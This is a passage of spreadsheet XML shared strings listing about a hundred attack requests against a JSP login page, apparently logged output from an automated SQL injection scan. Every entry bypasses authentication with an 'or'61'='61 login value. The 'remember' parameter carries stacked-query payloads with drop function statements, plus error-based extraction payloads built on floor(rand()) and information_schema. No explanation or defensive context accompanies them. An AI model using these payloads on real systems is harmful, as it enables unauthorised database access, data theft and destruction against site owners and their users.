    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;if((6251=6251),select6251,dropfunctionkfik);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;if((6486=8783),select6486,dropfunctionsdvb);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((8312=7281),select8312,dropfunctionrsjj);--and('tedm'='tedm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((6251=6251),select6251,dropfunctionkfik);--and('bxml'='bxml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((2449=7752),select2449,dropfunctiondkog);--and('ysir'='ysir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if((8421=4190),select8421,dropfunctionfzvc);--and(('wtns'='wtns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if((6251=6251),select6251,dropfunctionkfik);--and(('ctgi'='ctgi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if((1429=866),select1429,dropfunctionkdgq);--and(('peyi'='peyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if((9216=7191),select9216,dropfunctionenfc);--and((('yamt'='yamt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if((6251=6251),select6251,dropfunctionkfik);--and((('eyom'='eyom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if((7257=7562),select7257,dropfunctionsohl);--and((('ofrw'='ofrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((8154=7043),select8154,dropfunctionsowi);--and'ydix'='ydix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((6251=6251),select6251,dropfunctionkfik);--and'gehk'='gehk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((3330=6742),select3330,dropfunctionoxvt);--and'epju'='epju&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((2593=8544),select2593,dropfunctionndyt);--and('vsnz'like'vsnz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((6251=6251),select6251,dropfunctionkfik);--and('eslt'like'eslt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if((2342=429),select2342,dropfunctionabhx);--and('trxg'like'trxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if((6647=7605),select6647,dropfunctionqptf);--and(('kies'like'kies&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if((6251=6251),select6251,dropfunctionkfik);--and(('spoc'like'spoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if((7053=253),select7053,dropfunctionbsge);--and(('qhrf'like'qhrf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if((4521=1500),select4521,dropfunctionlpul);--and((('plzy'like'plzy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if((6251=6251),select6251,dropfunctionkfik);--and((('jvlw'like'jvlw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if((8387=4317),select8387,dropfunctionbhxm);--and((('ihlr'like'ihlr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((5268=4364),select5268,dropfunctionpbqu);--and'boqc'like'boqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((6251=6251),select6251,dropfunctionkfik);--and'oava'like'oava&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if((1760=3026),select1760,dropfunctionvhiz);--and'tvwz'like'tvwz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if((6550=5191),select6550,dropfunctionrllz);--and("iqux"="iqux&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if((6251=6251),select6251,dropfunctionkfik);--and("qyxf"="qyxf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if((4788=41),select4788,dropfunctionjlvq);--and("xeii"="xeii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if((745=2879),select745,dropfunctionqxmb);--and(("qcko"="qcko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if((6251=6251),select6251,dropfunctionkfik);--and(("rwqv"="rwqv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if((2557=5647),select2557,dropfunctiondzfo);--and(("fsaw"="fsaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if((3767=2750),select3767,dropfunctionhtga);--and((("ounm"="ounm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if((6251=6251),select6251,dropfunctionkfik);--and((("xrwd"="xrwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if((6595=750),select6595,dropfunctionmolp);--and((("zkqz"="zkqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((8047=3813),select8047,dropfunctionpvvs);--and"bdwp"="bdwp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((6251=6251),select6251,dropfunctionkfik);--and"asds"="asds&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((5246=8206),select5246,dropfunctionargy);--and"rhez"="rhez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if((6850=728),select6850,dropfunctionwvrt);--and("qpbf"like"qpbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if((6251=6251),select6251,dropfunctionkfik);--and("pjbs"like"pjbs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");if((7306=5733),select7306,dropfunctionramc);--and("unhj"like"unhj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if((5812=8773),select5812,dropfunctioncuwf);--and(("cmyq"like"cmyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if((6251=6251),select6251,dropfunctionkfik);--and(("szkh"like"szkh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));if((9053=4820),select9053,dropfunctionodgy);--and(("zpfi"like"zpfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if((9545=8944),select9545,dropfunctionwuhz);--and((("tjgg"like"tjgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if((6251=6251),select6251,dropfunctionkfik);--and((("qrwl"like"qrwl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));if((9188=2072),select9188,dropfunctionnrse);--and((("wkon"like"wkon&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((4720=2406),select4720,dropfunctionpjmg);--and"zfqa"like"zfqa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((6251=6251),select6251,dropfunctionkfik);--and"yvpu"like"yvpu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if((7352=2301),select7352,dropfunctiongwid);--and"yaih"like"yaih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(5304=5304&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((7095=7095&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(((5984=5984&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('eoqi'='eoqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('cmfl'='cmfl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('ojzw'='ojzw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'ytwl'='ytwl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('qjqg'like'qjqg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('vdcb'like'vdcb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('akmf'like'akmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'kxea'like'kxea&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("ktgm"="ktgm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("xbmm"="xbmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("hdtc"="hdtc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"mssj"="mssj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("fcwi"like"fcwi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("uuxk"like"uuxk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("xdyo"like"xdyo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and(select3303from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(3303=3303)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"tddo"like"tddo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and(6067=6067&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and((8276=8276&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and(((674=674&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and('ikae'='ikae&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and(('pjfk'='pjfk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and((('rhxn'='rhxn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and'xjvf'='xjvf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and('hrql'like'hrql&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and(('swan'like'swan&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and((('unhd'like'unhd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and'pbpf'like'pbpf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and("whlq"="whlq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and(("hdai"="hdai&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and((("ojtt"="ojtt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and"uwwd"="uwwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and("eeub"like"eeub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and(("taue"like"taue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and((("ivjn"like"ivjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="androw(9636,2914)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9636=9636)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select9636unionselect2914)agroupbyxlimit1)and"bfgu"like"bfgu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1743&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1890)or(select6285from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(6285=6285)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7993&amp;modo=entrar</t>
  </si>
  <si>
